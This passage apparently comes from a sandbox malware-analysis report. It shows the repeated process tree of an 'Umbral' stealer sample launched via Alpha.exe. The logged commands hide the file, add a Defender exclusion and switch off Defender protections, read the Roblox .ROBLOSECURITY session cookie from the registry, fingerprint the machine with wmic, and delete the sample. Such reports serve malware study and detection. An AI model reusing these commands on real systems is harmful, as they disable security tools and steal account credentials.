        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        5⤵
        
        PID:744
      - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        6⤵
        Executes dropped EXE
        
        PID:2192
      - C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        6⤵
        
        PID:1344
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        7⤵
        Executes dropped EXE
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        7⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4700
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        9⤵
        
        PID:2780
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        9⤵
        Views/modifies file attributes
        
        PID:2272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3788
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        9⤵
        
        PID:2148
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        9⤵
        
        PID:1260
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        9⤵
        
        PID:3680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1488
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:2832
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        9⤵
        
        PID:2112
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        10⤵
        Runs ping.exe
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        8⤵
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        9⤵
        Executes dropped EXE
        
        PID:3584
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        9⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        10⤵
        Executes dropped EXE
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        10⤵
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        11⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4156
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:2984
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        12⤵
        Views/modifies file attributes
        
        PID:3016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3224
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        12⤵
        
        PID:1868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        12⤵
        
        PID:3132
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:1212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1328
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        12⤵
        Detects videocard installed
        
        PID:3252
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        12⤵
        
        PID:480
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        13⤵
        Runs ping.exe
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        11⤵
        
        PID:4152
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        12⤵
        Executes dropped EXE
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        12⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        13⤵
        Executes dropped EXE
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        13⤵
        
        PID:4248
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        14⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2660
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:3060
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        15⤵
        Views/modifies file attributes
        
        PID:3264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4932
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:3252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:4184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:2364
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:2208
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:1524
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:3624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        
        PID:456
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:5108
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        15⤵
        
        PID:4132
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        Runs ping.exe
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        14⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        15⤵
        Executes dropped EXE
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        15⤵
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        16⤵
        Executes dropped EXE
        
        PID:976
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        16⤵
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        17⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1376
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:4428
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        18⤵
        Views/modifies file attributes
        
        PID:4204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        18⤵
        
        PID:4728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        
        PID:3624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        
        PID:4288
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        18⤵
        
        PID:1548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        18⤵
        
        PID:1984
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:4812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        18⤵
        
        PID:4992
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        18⤵
        Detects videocard installed
        
        PID:2728
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        18⤵
        
        PID:4440
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        19⤵
        Runs ping.exe
        
        PID:4764
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        17⤵
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        18⤵
        Executes dropped EXE
        
        PID:908
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        18⤵
        
        PID:4932
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        19⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2908
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        20⤵
        
        PID:328
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        20⤵
        Views/modifies file attributes
        
        PID:4724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        20⤵
        
        PID:2812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        
        PID:1608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        
        PID:3484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        20⤵
        
        PID:4976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        20⤵
        
        PID:1800
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        20⤵
        
        PID:5044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        20⤵
        
        PID:244
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        20⤵
        Detects videocard installed
        
        PID:4884
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        21⤵
        
        PID:560
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        20⤵
        
        PID:5056
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        21⤵
        Runs ping.exe
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        19⤵
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        20⤵
        Executes dropped EXE
        
        PID:4792
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        20⤵
        
        PID:4840
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        21⤵
        Executes dropped EXE
        
        PID:3152
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        21⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        22⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2856
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:1292
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        23⤵
        Views/modifies file attributes
        
        PID:2120
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:2812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        23⤵
        
        PID:3748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        
        PID:4532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        
        PID:1840
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        23⤵
        
        PID:1576
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        23⤵
        
        PID:2152
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        23⤵
        
        PID:3772
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        23⤵
        Detects videocard installed
        
        PID:1956
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        23⤵
        
        PID:4572
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        24⤵
        Runs ping.exe
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        22⤵
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        23⤵
        Executes dropped EXE
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        23⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        24⤵
        Drops file in Drivers directory
        
        PID:2600
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:2644
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        25⤵
        Views/modifies file attributes
        
        PID:1820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2460
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:3848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        25⤵
        
        PID:3160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:1956
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:2152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:3620
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        25⤵
        
        PID:1844
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:1820
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        25⤵
        
        PID:2412
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:2872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        25⤵
        
        PID:236
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        25⤵
        Detects videocard installed
        
        PID:2720
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        25⤵
        
        PID:3384
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        26⤵
        Runs ping.exe
        
        PID:3796
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        24⤵
        
        PID:4932
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        25⤵
        
        PID:1460
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        25⤵
        
        PID:1996
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        26⤵
        
        PID:4812
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        26⤵
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        27⤵
        Drops file in Drivers directory
        
        PID:3252
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:3144
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        28⤵
        Views/modifies file attributes
        
        PID:3772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        28⤵
        
        PID:2340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        
        PID:4724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        
        PID:3496
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        28⤵
        
        PID:4812
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        28⤵
        
        PID:2372
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:3964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        28⤵
        
        PID:5028
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        28⤵
        Detects videocard installed
        
        PID:3152
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        28⤵
        
        PID:4552
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        29⤵
        Runs ping.exe
        
        PID:4728
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        27⤵
        
        PID:4888
        
